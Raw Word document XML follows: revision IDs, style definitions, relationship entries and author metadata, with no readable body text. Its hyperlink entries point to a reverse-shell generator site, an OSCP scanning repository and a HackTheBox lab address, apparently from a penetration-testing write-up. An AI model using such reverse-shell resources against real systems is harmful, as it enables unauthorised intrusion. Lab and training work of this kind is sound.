    <w:rsid w:val="00D719A4"/>
    <w:rsid w:val="00D738F0"/>
    <w:rsid w:val="00D73AED"/>
    <w:rsid w:val="00D762C9"/>
    <w:rsid w:val="00D77691"/>
    <w:rsid w:val="00D81387"/>
    <w:rsid w:val="00D82B6B"/>
    <w:rsid w:val="00D97049"/>
    <w:rsid w:val="00DA03BB"/>
    <w:rsid w:val="00DA4207"/>
    <w:rsid w:val="00DA6233"/>
    <w:rsid w:val="00DC7ECD"/>
    <w:rsid w:val="00DD6D07"/>
    <w:rsid w:val="00DF44C5"/>
    <w:rsid w:val="00DF4E4B"/>
    <w:rsid w:val="00DF5C9C"/>
    <w:rsid w:val="00DF78DD"/>
    <w:rsid w:val="00E0069D"/>
    <w:rsid w:val="00E108D4"/>
    <w:rsid w:val="00E13A63"/>
    <w:rsid w:val="00E215AD"/>
    <w:rsid w:val="00E30A34"/>
    <w:rsid w:val="00E35BEE"/>
    <w:rsid w:val="00E377BC"/>
    <w:rsid w:val="00E42076"/>
    <w:rsid w:val="00E424DB"/>
    <w:rsid w:val="00E44C9B"/>
    <w:rsid w:val="00E51B23"/>
    <w:rsid w:val="00E52947"/>
    <w:rsid w:val="00E54F59"/>
    <w:rsid w:val="00E64ED1"/>
    <w:rsid w:val="00E66DE1"/>
    <w:rsid w:val="00E672F4"/>
    <w:rsid w:val="00E77338"/>
    <w:rsid w:val="00E8428B"/>
    <w:rsid w:val="00E857F0"/>
    <w:rsid w:val="00EA202F"/>
    <w:rsid w:val="00EA6524"/>
    <w:rsid w:val="00EB006B"/>
    <w:rsid w:val="00EB1755"/>
    <w:rsid w:val="00EB7960"/>
    <w:rsid w:val="00EC08E2"/>
    <w:rsid w:val="00EC127A"/>
    <w:rsid w:val="00EC1EA9"/>
    <w:rsid w:val="00EC52A3"/>
    <w:rsid w:val="00EE087C"/>
    <w:rsid w:val="00EF04B6"/>
    <w:rsid w:val="00EF7A42"/>
    <w:rsid w:val="00F01D74"/>
    <w:rsid w:val="00F04722"/>
    <w:rsid w:val="00F068FA"/>
    <w:rsid w:val="00F1324A"/>
    <w:rsid w:val="00F137E2"/>
    <w:rsid w:val="00F27397"/>
    <w:rsid w:val="00F3310B"/>
    <w:rsid w:val="00F36416"/>
    <w:rsid w:val="00F44FF5"/>
    <w:rsid w:val="00F548E7"/>
    <w:rsid w:val="00F640D4"/>
    <w:rsid w:val="00F656B2"/>
    <w:rsid w:val="00F714F6"/>
    <w:rsid w:val="00F73581"/>
    <w:rsid w:val="00F7760A"/>
    <w:rsid w:val="00F84C80"/>
    <w:rsid w:val="00FC0BF1"/>
    <w:rsid w:val="00FC3422"/>
    <w:rsid w:val="00FF5452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A99C"/>
  <w15:docId w15:val="{E264C72B-0124-4791-92C1-A827D5D64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lang w:val="en-ZA" w:eastAsia="en-ZA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 w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="he-I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113" w:after="57"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="BodyA"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="113" w:after="57"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:bCs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113" w:after="57"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria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="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F9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character" w:customStyle="1" w:styleId="NoneA">
    <w:name w:val="None A"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="None">
    <w:name w:val="None"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink0">
    <w:name w:val="Hyperlink.0"/>
    <w:basedOn w:val="None"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single" w:color="0000FF"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:color w:val="000000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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IndexLink">
    <w:name w:val="Index Link"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink1">
    <w:name w:val="Hyperlink1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO4LVL1">
    <w:name w:val="WW_CharLFO4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2">
    <w:name w:val="WW_CharLFO4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3">
    <w:name w:val="WW_CharLFO4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4">
    <w:name w:val="WW_CharLFO4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5">
    <w:name w:val="WW_CharLFO4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6">
    <w:name w:val="WW_CharLFO4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7">
    <w:name w:val="WW_CharLFO4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8">
    <w:name w:val="WW_CharLFO4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9">
    <w:name w:val="WW_CharLFO4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1">
    <w:name w:val="WW_CharLFO5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2">
    <w:name w:val="WW_CharLFO5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3">
    <w:name w:val="WW_CharLFO5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4">
    <w:name w:val="WW_CharLFO5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5">
    <w:name w:val="WW_CharLFO5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6">
    <w:name w:val="WW_CharLFO5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7">
    <w:name w:val="WW_CharLFO5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8">
    <w:name w:val="WW_CharLFO5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9">
    <w:name w:val="WW_CharLFO5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1">
    <w:name w:val="WW_CharLFO6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2">
    <w:name w:val="WW_CharLFO6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3">
    <w:name w:val="WW_CharLFO6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4">
    <w:name w:val="WW_CharLFO6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5">
    <w:name w:val="WW_CharLFO6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6">
    <w:name w:val="WW_CharLFO6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7">
    <w:name w:val="WW_CharLFO6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8">
    <w:name w:val="WW_CharLFO6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9">
    <w:name w:val="WW_CharLFO6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1">
    <w:name w:val="WW_CharLFO7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2">
    <w:name w:val="WW_CharLFO7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3">
    <w:name w:val="WW_CharLFO7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4">
    <w:name w:val="WW_CharLFO7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5">
    <w:name w:val="WW_CharLFO7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6">
    <w:name w:val="WW_CharLFO7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7">
    <w:name w:val="WW_CharLFO7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8">
    <w:name w:val="WW_CharLFO7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9">
    <w:name w:val="WW_CharLFO7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8LVL1">
    <w:name w:val="WW_CharLFO8LVL1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL2">
    <w:name w:val="WW_CharLFO8LVL2"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL3">
    <w:name w:val="WW_CharLFO8LVL3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL4">
    <w:name w:val="WW_CharLFO8LVL4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL5">
    <w:name w:val="WW_CharLFO8LVL5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL6">
    <w:name w:val="WW_CharLFO8LVL6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL7">
    <w:name w:val="WW_CharLFO8LVL7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL8">
    <w:name w:val="WW_CharLFO8LVL8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL9">
    <w:name w:val="WW_CharLFO8LVL9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="480" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F253F"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:eastAsia="DejaVu Serif" w:hAnsi="DejaVu Serif" w:cs="DejaVu Serif"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:r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Normal1">
    <w:name w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="00000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pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto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Footer">
    <w:name w:val="footer"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto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Title">
    <w:name w:val="Title"/>
    <w:next w:val="BodyA"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:contextualSpacing/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:color w:val="17365D"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Heading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BodyA">
    <w:name w:val="Body A"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto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IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Heading"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="480" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F253F"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9340"/>
      </w:tabs>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="100" w:line="288" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9560"/>
      </w:tabs>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="100" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="220"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body">
    <w:name w:val="Body"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="720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pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22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OC11">
    <w:name w:val="TOC 11"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC21">
    <w:name w:val="TOC 21"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC31">
    <w:name w:val="TOC 31"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Index"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1">
    <w:name w:val="No List_1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="ImportedStyle1">
    <w:name w:val="Imported Style 1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="ImportedStyle2">
    <w:name w:val="Imported Style 2"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003653E0"/>
    <w:pPr>
      <w:overflowPunct/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:textAlignment w:val="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:lang w:val="en-IL" w:eastAsia="en-IL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B400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773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806EA"/>
    <w:rPr>
      <w:color w:val="551A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revshells.com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J4c0b-1337x007/oscpSAscan" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin@htb.local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9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Yehonatan Sion</dc:creator>
  <cp:lastModifiedBy>Yehonatan Sion</cp:lastModifiedBy>
  <cp:revision>436</cp:revision>
  <cp:lastPrinted>2025-08-06T09:32:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-29T13:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-08T22:59:00Z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2023-11-24T20:00:00Z</dcterms:created>
  <dc:creator>irtza ch</dc:creator>
  <dc:description/>
  <dc:language>en-CA</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-21T09:50:50Z</dcterms:modified>
  <cp:revision>15</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>